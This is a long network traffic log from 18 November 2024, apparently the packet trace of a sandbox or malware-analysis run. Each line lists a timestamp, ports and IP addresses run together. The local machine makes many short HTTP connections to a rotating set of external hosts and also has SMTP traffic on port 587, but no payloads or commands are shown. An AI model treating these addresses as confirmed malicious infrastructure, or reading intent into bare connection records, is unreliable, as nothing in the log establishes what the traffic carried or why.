                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.055623055 CET50007587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.060847044 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.080708981 CET8050056208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.118952036 CET5014180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.124056101 CET805014144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.124218941 CET5014180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.124485016 CET5014180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.124504089 CET5014180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.129447937 CET805014144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.129482031 CET805014144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.130013943 CET5005680192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.295696974 CET5875000751.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.310498953 CET50007587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.585155964 CET8050140172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.585244894 CET5014080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.601469994 CET5014080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.606364012 CET8050140172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.742863894 CET5014280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.747800112 CET8050142172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.747875929 CET5014280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.796153069 CET805014144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.816052914 CET5014280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.816090107 CET5014280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.816735983 CET5014180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.821046114 CET8050142172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.821058035 CET8050142172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.821995020 CET805014144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.823009014 CET5014180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.829667091 CET5014380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.834575891 CET805014334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.834640026 CET5014380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.834732056 CET5014380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.834748983 CET5014380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.839570045 CET805014334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.839580059 CET805014334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.419744968 CET8050142172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.419850111 CET5014280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.420917988 CET5014280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.425776005 CET8050142172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.455903053 CET5014480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.460865021 CET805014454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.460942984 CET5014480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.465476036 CET5014480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.465512037 CET5014480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.471147060 CET805014454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.471168995 CET805014454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.666192055 CET805014334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.666348934 CET5014380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.672384977 CET805014334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.673672915 CET5014380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.680139065 CET5014580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.685295105 CET805014518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.685403109 CET5014580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.685534954 CET5014580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.685560942 CET5014580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.690781116 CET805014518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.690813065 CET805014518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.723969936 CET5014480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.726766109 CET5014680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.732042074 CET805014654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.732129097 CET5014680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.732314110 CET5014680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.732367039 CET5014680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.737500906 CET805014654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.737534046 CET805014654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.365936041 CET805014518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.366955042 CET5014580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.375905037 CET805014518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.376888037 CET5014580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.379760027 CET5014780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.386077881 CET80501473.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.386158943 CET5014780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.387160063 CET5014780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.387160063 CET5014780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.392539978 CET80501473.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.392647028 CET80501473.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.585407972 CET805014654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.585614920 CET5014680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.592830896 CET805014654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.593034029 CET5014680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.606772900 CET5014880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.614448071 CET805014844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.614551067 CET5014880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.618343115 CET5014880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.618446112 CET5014880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.626255989 CET805014844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.626270056 CET805014844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.269243956 CET805014844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.269511938 CET5014880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.275366068 CET805014844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.275470972 CET5014880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.305464983 CET5014980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.310544014 CET805014934.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.313677073 CET5014980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.313880920 CET5014980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.313977957 CET5014980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.319261074 CET805014934.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.319344997 CET805014934.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.370393991 CET80501473.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.371330976 CET5014780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.376813889 CET80501473.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.376873016 CET5014780192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.387686968 CET5015080192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.392709017 CET805015054.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.392802000 CET5015080192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.392906904 CET5015080192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.392939091 CET5015080192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.397896051 CET805015054.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.398067951 CET805015054.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.156852007 CET805014934.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.157145977 CET5014980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.163197994 CET805014934.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.163290024 CET5014980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.178889990 CET5015180192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.183877945 CET805015134.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.184062004 CET5015180192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.184504986 CET5015180192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.184504986 CET5015180192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.189549923 CET805015134.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.189584017 CET805015134.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.234364986 CET805015054.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.239366055 CET5015080192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.245217085 CET805015054.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.245292902 CET5015080192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.254893064 CET5015280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.259958982 CET805015254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.260106087 CET5015280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.260226011 CET5015280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.260240078 CET5015280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.265129089 CET805015254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.265517950 CET805015254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.027929068 CET805015134.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.028630018 CET5015180192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.035540104 CET805015134.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.035703897 CET5015180192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.049556017 CET5015380192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.054791927 CET805015334.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.054977894 CET5015380192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.055444956 CET5015380192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.055515051 CET5015380192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.060368061 CET805015334.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.060621977 CET805015334.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.084187984 CET805015254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.084342003 CET5015280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.089725971 CET805015254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.089855909 CET5015280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.100423098 CET5015480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.105417013 CET805015418.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.105585098 CET5015480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.105700016 CET5015480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.105809927 CET5015480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.111103058 CET805015418.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.111161947 CET805015418.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.727133036 CET5015380192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.758872986 CET5015580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.764306068 CET805015534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.764389038 CET5015580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.765727043 CET5015580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.765727043 CET5015580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.770773888 CET805015534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.770801067 CET805015534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.937468052 CET805015418.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.937769890 CET5015480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.943495989 CET805015418.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.943553925 CET5015480192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.955336094 CET5015680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.960345984 CET805015618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.961587906 CET5015680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.963327885 CET5015680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.963327885 CET5015680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.968410969 CET805015618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.968432903 CET805015618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.628020048 CET805015618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.634237051 CET5015680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.639849901 CET805015618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.639942884 CET5015680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.661815882 CET5015780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.666728020 CET805015744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.666800976 CET5015780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.667190075 CET5015780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.667202950 CET5015780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.672122955 CET805015744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.672236919 CET805015744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.739128113 CET805015534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.739336014 CET5015580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.744724989 CET805015534.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.744858980 CET5015580192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.754954100 CET5015880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.759967089 CET805015818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.760274887 CET5015880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.760274887 CET5015880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.760274887 CET5015880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.765307903 CET805015818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.765338898 CET805015818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.321026087 CET805015744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.322376013 CET5015780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.328062057 CET805015744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.329618931 CET5015780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.355952978 CET5015980192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.360862017 CET805015972.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.360938072 CET5015980192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.363348961 CET5015980192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.363435030 CET5015980192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.368422985 CET805015972.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.368556976 CET805015972.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.594607115 CET805015818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.594768047 CET5015880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.600231886 CET805015818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.602241039 CET5015880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.611430883 CET5016080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.616370916 CET805016047.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.616566896 CET5016080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.684935093 CET5016080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.684971094 CET5016080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.690005064 CET805016047.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.690017939 CET805016047.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.085499048 CET805015972.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.085799932 CET5015980192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.085799932 CET5015980192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.087198973 CET5016180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.091058969 CET805015972.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.092154980 CET805016172.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.092222929 CET5016180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.094367027 CET5016180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.094394922 CET5016180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.099324942 CET805016172.52.178.23192.168.2.7
